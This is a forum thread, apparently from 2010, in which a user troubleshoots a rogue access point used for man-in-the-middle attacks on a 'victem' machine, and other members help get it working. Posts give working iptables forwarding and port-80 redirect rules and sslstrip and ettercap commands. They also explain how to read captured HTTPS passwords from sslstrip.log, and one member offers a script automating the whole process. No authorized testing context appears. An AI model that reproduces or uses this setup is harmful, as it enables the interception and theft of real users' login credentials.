Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: help needed with fakeAP and man in the middle

  1. #1
    Junior Member
    Join Date
    Jun 2009
    Posts
    47

    Default help needed with fakeAP and man in the middle

    hi,

    i have a fake access point setup, it gives a dhcp address and routes through my machine running backtrack and to the internet.

    my problem is when i run ettercap the connection from the victem machine is lost

    my setting are:

    victem machine connects wireless to AP
    AP connects eth0 to Attacker
    Attacker wlan0 to internet

    i forward traffic by
    echo '1' > /proc/sys/net/ipv4/ip_forward
    iptables -X
    iptables -F
    iptables -A FORWARD -i wlan0 -o eth0 -s 192.168.1.0/24 -m state --state NEW -j ACCEPT
    iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A POSTROUTING -t nat -j MASQUERADE
    route del default
    route add default gw 192.168.0.1 wlan0

    at this point everything is good and the victem is on the internet

    then when i do

    sslstrip -a -k -f
    ettercap -T -q -i wlan0

    the connection from the victem to the internet is lost. i am not sure if i have to arpspoof the victem since all the traffic is coming through me anyways

    hope you can help
    thanks in advance

  2. #2
    Member
    Join Date
    Jan 2010
    Posts
    70

    Default Re: help needed with fakeAP and man in the middle

    The point of ettercap is to put yourself between the user and the gateway. Essentially, ettercap turns your machine into a "poor man's" gateway (it's a simplistic way of thinking).

    In your setup, you don't need to run ettercap. You're already the gateway. Simply setup the iptables / ebtables to locally terminate those connections which you're interested in. Running Ettercap (or arpspoof, et. al.) may cause weird issues with arp / mac tables.

  3. #3
    Junior Member
    Join Date
    Jun 2009
    Posts
    47

    Default Re: help needed with fakeAP and man in the middle

    thanks for the reply

    so without running sslstrip and ettercap how would i capture ssl passwords
    Last edited by roonie; 08-29-2010 at 07:22 PM.

  4. #4
    Senior Member voidnecron's Avatar
    Join Date
    May 2010
    Posts
    132

    Default Re: help needed with fakeAP and man in the middle

    You could/should run sslstrip, otherwise you won't be able to 'read' the ssl encrypted traffic.
    And you can run ettercap without the arp poisoning.
    Otherwise you can just fire up wireshark and filter the passwords from there.
    "The difference between RAID1 and RAID0 is that the zero stands for how many files you're gonna have after a harddisk failure."

  5. #5
    Junior Member
    Join Date
    Jun 2009
    Posts
    47

    Default Re: help needed with fakeAP and man in the middle

    Quote Originally Posted by voidnecron View Post
    You could/should run sslstrip, otherwise you won't be able to 'read' the ssl encrypted traffic.
    And you can run ettercap without the arp poisoning.
    Otherwise you can just fire up wireshark and filter the passwords from there.
    hi, i tried runnning sslstrip and ettercap without arp poisoning but for some reason as soon as i run ettercap it stops the connection from victem to internet.

    also how could i view https passwords in wireshark?
    Last edited by roonie; 08-29-2010 at 09:52 PM.

  6. #6
    Member
    Join Date
    Jan 2010
    Posts
    70

    Default Re: help needed with fakeAP and man in the middle

    If you look at almost any sslstrip tutorial, it basically tells you what you need to do.

    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    I suggest looking at the block diagram of iptables to learn exactly where prerouting, postrouting, etc. come into play in terms of packet modification.

  7. #7
    Junior Member
    Join Date
    Jun 2009
    Posts
    47

    Default Re: help needed with fakeAP and man in the middle

    Quote Originally Posted by orgcandman View Post
    If you look at almost any sslstrip tutorial, it basically tells you what you need to do.

    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    I suggest looking at the block diagram of iptables to learn exactly where prerouting, postrouting, etc. come into play in terms of packet modification.
    hi, i understand all that i am using

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

    sslstrip -a -f -k -l 8080

    this works fine and would save the passwords in sslstrip.log however it is alot to go searching through sslstrip.log

    my problem is when i run ettercap to try and see these passwords as they happen it kills the connection cant understand why?

  8. #8
    Member
    Join Date
    Jan 2010
    Posts
    70

    Default Re: help needed with fakeAP and man in the middle

    I would guess that ettercap is messing with the iptables settings and breaking your NAT forwarding.

    Also - just use grep on the written file, or tail -f combined with grep.

  9. #9
    Junior Member
    Join Date
    Jun 2009
    Posts
    47

    Default Re: help needed with fakeAP and man in the middle

    *UPDATE*

    found the answer!

    when i run ettercap it kills the connection found i had to run the command

    echo '1' > /proc/sys/net/ipv4/ip_forward

    again after i started ettercap. dont really understand why tho since i already did this command before. seems like ettercap is changing it

  10. #10
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default Re: help needed with fakeAP and man in the middle

    You have more than likely edited etter.conf somewhere along the line and told it to ipforward. If you open etter.conf and rehash the Linux ip forwarding lines the problem should disappear, in the mean time I have a script HERE that automates this whole process.
    Last edited by killadaninja; 08-30-2010 at 10:38 AM.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

Page 1 of 2 12 LastLast

Similar Threads

  1. FakeAP
    By halfdone in forum Beginners Forum
    Replies: 1
    Last Post: 03-25-2010, 02:56 PM
  2. man in the middle
    By halfdone in forum Beginners Forum
    Replies: 1
    Last Post: 02-11-2010, 10:23 PM
  3. man in the middle with ettercap?
    By kid protocol in forum OLD Newbie Area
    Replies: 13
    Last Post: 04-24-2009, 08:14 PM
  4. Fakeap
    By Duritoxn in forum OLD Newbie Area
    Replies: 10
    Last Post: 07-12-2007, 05:53 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •